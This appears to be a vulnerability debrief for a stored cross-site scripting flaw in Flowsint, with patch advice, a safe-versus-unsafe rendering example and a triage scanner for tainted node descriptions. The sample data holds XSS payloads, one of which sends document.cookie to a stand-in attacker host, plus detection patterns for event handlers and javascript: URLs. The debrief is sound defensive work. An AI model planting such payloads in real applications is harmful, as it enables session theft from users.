PatchSiren cyber security CVE debrief
CVE-2026-42159 reconurge CVE debrief
CVE-2026-42159 affects Flowsint prior to 1.2.3. According to the NVD record and the linked GitHub advisory, a remote attacker can create a node with a malicious description containing arbitrary HTML. When another user selects that node, the HTML is rendered and may trigger stored cross-site scripting. The issue is rated medium severity (CVSS 5.3) and is fixed in Flowsint 1.2.3.
- Vendor: reconurge
- Product: flowsint
- CVSS: MEDIUM 5.3
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-05-14
- Original CVE updated: 2026-05-21
- Advisory published: 2026-05-14
- Advisory updated: 2026-05-21
Who should care
Flowsint administrators, security teams, and analysts who create, share, or review investigations and sketches should treat this as relevant, especially in collaborative or multi-user environments where untrusted content can be introduced into node descriptions.
Technical summary
The vulnerable behavior is in node rendering: a node description can contain attacker-controlled HTML, and when a user selects that node the UI renders the description as markup rather than as text, so any script or event handler in it executes in that user's browser session. The result is a stored XSS condition (CWE-79); the attack vector is network (any user who can create or edit a node in a shared investigation can plant the payload) and user interaction is required (the victim has to select the node). NVD lists Flowsint versions before 1.2.3 as affected; the vendor advisory identifies the fix in 1.2.3.
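The pattern behind this bug class, shown as an added illustration rather than Flowsint's own code: a node card built from an untrusted description, once with the description interpolated verbatim (the vulnerable shape) and once with it HTML-escaped (the hardened shape). The node fields, function names and the sample payload are assumptions chosen for the example; the real Flowsint rendering path is not reproduced here.

```javascript
// Added illustration of stored XSS via a node description rendered as HTML.
// NOT Flowsint's code: node shape, function names and the sample payload are
// assumptions for the example.

// Escape the five characters that let text break out of an element body or
// attribute value. Output is safe to place inside an element's body.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the attacker-controlled description is dropped into the
// markup unchanged. A UI that assigns this string to element.innerHTML (or
// renders it with any "raw HTML" helper) parses the payload as real elements.
function renderNodeCardUnsafe(node) {
  return `<div class="node-card">` +
         `<h3>${escapeHtml(node.label)}</h3>` +
         `<p class="description">${node.description}</p>` +
         `</div>`;
}

// Hardened pattern: every untrusted field goes through escapeHtml, so a
// description containing markup is displayed as literal text. In a DOM-based
// UI the equivalent is `p.textContent = node.description` instead of innerHTML.
function renderNodeCardSafe(node) {
  return `<div class="node-card">` +
         `<h3>${escapeHtml(node.label)}</h3>` +
         `<p class="description">${escapeHtml(node.description)}</p>` +
         `</div>`;
}

// Constructed sample node (not real Flowsint data). The description carries
// an image tag with an event handler, the classic no-<script> XSS payload.
const SAMPLE_NODE = {
  id: "n-1",
  label: "example.org",
  description: '<img src=x onerror="alert(document.cookie)">',
};

// Show both renderings side by side when run directly.
console.log("unsafe:", renderNodeCardUnsafe(SAMPLE_NODE));
console.log("safe:  ", renderNodeCardSafe(SAMPLE_NODE));
```

Escaping is the right fix when descriptions are meant to be plain text. If rich descriptions are a product feature, the alternative is an allowlist HTML sanitizer (DOMPurify is the usual choice in browser code) applied at render time; a denylist of "dangerous tags" is not a substitute, because event-handler attributes and `javascript:` URLs survive it.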
Defensive priority
Medium priority. Patch before further use of affected versions, especially if Flowsint is exposed to multiple users or accepts imported, shared, or externally sourced investigation content.
Recommended defensive actions
- Upgrade Flowsint to version 1.2.3 or later.
- Review any workflows that allow untrusted users or imported data to populate node descriptions.
- Treat existing investigation content as potentially tainted until validated and sanitized.
- If upgrading is delayed, restrict access to affected instances and limit who can create or edit sketches.
- Use the linked vendor advisory and NVD record to verify remediation status and affected versions.
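A triage helper for the "treat existing investigation content as potentially tainted" step, added here as an example and not a Flowsint tool. It walks an exported investigation and lists every node whose description looks like it carries active markup, so a team can review those nodes before anyone selects them in an unpatched instance. The export layout (sketches containing nodes with a `description` field), the function names and the sample data are assumptions for the example.

```javascript
// Added triage scan for stored node descriptions. NOT a Flowsint tool: the
// export layout (sketches -> nodes -> description) and the field names are
// assumptions for the example.

// Indicators that a description contains content a browser could interpret.
// The tag regex deliberately requires a letter right after "<": browsers treat
// "a < b" as text, so ordinary comparisons in analyst notes are not flagged.
const INDICATORS = [
  ["html-tag", /<\/?[a-z][\w-]*/i],            // raw element start or end
  ["event-handler", /\bon[a-z]+\s*=/i],         // onerror=, onload=, ...
  ["javascript-uri", /javascript\s*:/i],        // href="javascript:..."
  ["html-data-uri", /data\s*:\s*text\/html/i],  // data:text/html,<script>
];

// Return the list of indicator names that a single description trips.
function classifyDescription(description) {
  if (typeof description !== "string") return [];
  return INDICATORS
    .filter(([, re]) => re.test(description))
    .map(([reason]) => reason);
}

// Walk an exported investigation and report every node whose description
// trips at least one indicator. Returns [{ sketch, node, reasons }].
function findTaintedNodes(exportData) {
  const findings = [];
  for (const sketch of exportData.sketches || []) {
    for (const node of sketch.nodes || []) {
      const reasons = classifyDescription(node.description);
      if (reasons.length > 0) {
        findings.push({ sketch: sketch.id, node: node.id, reasons });
      }
    }
  }
  return findings;
}

// Constructed sample export (not real data): two benign descriptions, one
// image tag with an event handler, one link with a javascript: URL.
const SAMPLE_EXPORT = {
  sketches: [
    { id: "s1", nodes: [
      { id: "n1", description: "Registrar contact, verified 2026-05-10" },
      { id: "n2", description: '<img src=x onerror="fetch(\'https://attacker.example/\' + document.cookie)">' },
    ]},
    { id: "s2", nodes: [
      { id: "n3", description: "a < b, and b > c" },
      { id: "n4", description: '<a href="javascript:alert(1)">profile</a>' },
    ]},
  ],
};

// Print the findings as one line per tainted node when run directly.
for (const f of findTaintedNodes(SAMPLE_EXPORT)) {
  console.log(`${f.sketch}/${f.node}: ${f.reasons.join(", ")}`);
}
```

This is a review aid, not a sanitizer: a flagged description still needs a human to decide whether it is a legitimate note about HTML or an injected payload, and the upgrade to 1.2.3 remains the actual fix.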
Evidence notes
The CVE record was published on 2026-05-14 and last modified on 2026-05-21. NVD marks the vulnerability status as Analyzed and lists Flowsint versions before 1.2.3 as vulnerable. The advisory reference on GitHub is the primary vendor-linked source and identifies CWE-79. The provided CVSS v4.0 vector reflects network-reachable impact with user interaction required.
Official resources
- CVE-2026-42159 CVE record (CVE.org)
- CVE-2026-42159 NVD detail (NVD)
- Source item URL: nvd_modified
- Mitigation or vendor reference: [email protected] - Exploit, Vendor Advisory
Publicly disclosed on 2026-05-14 and updated on 2026-05-21; the fix is identified as Flowsint 1.2.3.